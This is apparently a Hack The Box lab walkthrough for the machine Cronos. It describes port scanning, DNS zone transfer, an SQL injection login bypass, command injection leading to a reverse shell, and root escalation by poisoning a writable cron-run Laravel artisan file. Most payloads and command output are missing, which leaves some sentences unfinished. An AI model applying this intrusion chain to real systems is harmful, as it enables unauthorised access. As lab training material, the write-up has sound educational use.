Cronos

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.13

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Aggressive OS guesses: Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.2 - 4.9 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration: DNS - TCP/UDP 50

For DNS enumeration, the first thing to do is try to resolve the IPs of Cronos. I’ll use nslookup, setting the server to Cronos, and then looking up Cronos’ IP:

Knowing the domain ns1.cronos.htb is useful, as it not only provides a domain name to poke at, but also confirms the base domain cronos.htb. Any time there’s TCP DNS, it’s worth trying a zone transfer, which returns another two subdomains, admin and www:

I’ll add the following line to my /etc/hosts file:

Since virtual hosts are involved here, I’ll run a quick gobuster subdomain brute force, but it only returns the known three:

Enumeration: Website - TCP 80

By visiting the website by IP address, I just get the default Ubuntu Apache 2 page: I ran a gobuster brute force, but didn’t find anything. ns1.cronos.htb returns the same thing.

Gobuster Enumeration:

Virtual Host Enumeration:

www.cronos.htb - TCP 80

Interestingly, all of the links go to external sites for Laravel, a “PHP framework for web artisans” (whatever that means). Again, gobuster here only returns /css, /js, and index.php.

searchsploit does show exploits against the Laravel framework:

On doing some inspection of these scripts (searchsploit -x [Path]), the first one is a way to trick the hash engine because of a truncation issue, but I don’t see any way to apply it here. The second, forth, and fifth are not for this web framework.

The Metasploit script could have promise, but there are two issues:

  • I don’t know the version of Laravel that’s being run to know if it is vulnerable.

  • The exploit requires that I find a way to leak the APP_KEY. If I can find a way to leak that (perhaps an LFI), I’ll come back to give this a try.

admin.cronos.htb - TCP 80

The site just presents a login form and an advertisement (something I hadn’t seen in HTB before; it seems to be real).

Shell as www-data

SQLi Bypass Login:

The payload allows me to bypass the login, which presents the next page, Net Tool v0.1:

With SQL injection, the attacker is injecting additional characters into the original SQL statement, causing an entirely different SQL query to be executed. In the case

Command Injection:

The dropdown offers traceroute and ping. I can ping myself, and the results are printed on the screen:

It is so I’m not sure why this didn’t work. Let’s try python.

We get back a low privileged shell!

Priv: www-data –> root

I’ll go into my local linPEAS directory and start a Python3 webserver. Then I can grab it from Cronos:

LogoPEASS-ng/linPEAS at master · peass-ng/PEASS-ngGitHub

Now run it, and in the Cron jobs section, the last line is red:

The cron syntax here says that it will run every minute, as root

I don’t really need to know what the Laravel artisan is doing. What does matter is that as www-data, I have write permissions on that file

Poison artisan

Make a copy of the artisan file

Create the reverse shell payload

Cron job will run every minute

PreviousTabbyNextNineveh

Last updated